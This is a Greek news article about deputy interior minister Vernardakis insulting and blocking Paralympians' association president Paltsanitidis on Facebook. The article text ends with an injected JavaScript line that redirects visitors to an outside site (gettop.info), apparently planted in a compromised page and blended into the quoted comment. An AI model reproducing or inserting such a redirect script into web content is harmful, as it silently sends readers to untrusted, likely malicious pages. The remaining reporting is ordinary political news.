Επίθεση Βερναρδάκη στον πρόεδρο του συλλόγου Παραολυμπιονικών: Φασιστάκι της πλάκας

0
11

 

Τον μπλόκαρε στη σελίδα του στο facebook χαρακτηρίζοντάς τον «φασιστάκι της πλάκας» και «ρατσιστοειδή τύπο» ο αναπληρωτής υπουργός Εσωτερικών Χριστόφορος Βερναρδάκης τον Πρόεδρο του Συλλόγου Παραολυμπιονικών, Σίμο Παλτσανιτίδη.

Ο κ. Βερναρδάκης αναδημοσίευσε στον λογαριασμό του στο Facebook ένα άρθρο-ανάρτηση με τίτλο «Θείος Μαρξ και θεϊκός Αρθούρος».

Ο κ. Παλτσανιτίδης σχολίασε την ανάρτηση, γράφοντας: «Αυτοί στον ΣΥΡΙΖΑ δεν είναι σίγουρα καλά!!! ή μάλλον είναι πολύ καλά και πάνε πιo δεξιά από το δεξιά με τον δικό τους ρυθμό..Να προλάβουν να ξεπουλήσουν αξίες,ιδανικά, πατρίδα ,Έθνος, κυριαρχία, και να την κάνουν…ΝΤΡΟΠΗ ..«.

Ο υπουργός απάντησε: «Το καλό με κάτι τέτοιες «δύσκολες» αναρτήσεις είναι ότι αποκαλύπτονται διάφοροι ρατσιστοειδείς τύποι σαν και του λόγου σου…δεν ξέρω πώς παρεισέφρυσες στους «φίλους» μου, αλλά δικαιούσαι ένα μεγαλοπρεπές μπλοκάρισμα φασιστάκι της πλάκας….» και ο. κ. Παλτσανιτίδης, ο οποίος σημειώνεται ότι ήταν μέλος του ΣΥΡΙΖΑ μέχρι το καλοκαίρι, αντέτεινε: «Τα συμπεράσματα δικά σας!!!!
Να τον χαίρεστε!!!
ΚΑΛΗ ΑΠΕΛΕΥΘΈΡΩΣΗ..
ΕΛΛΑΔΑ». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here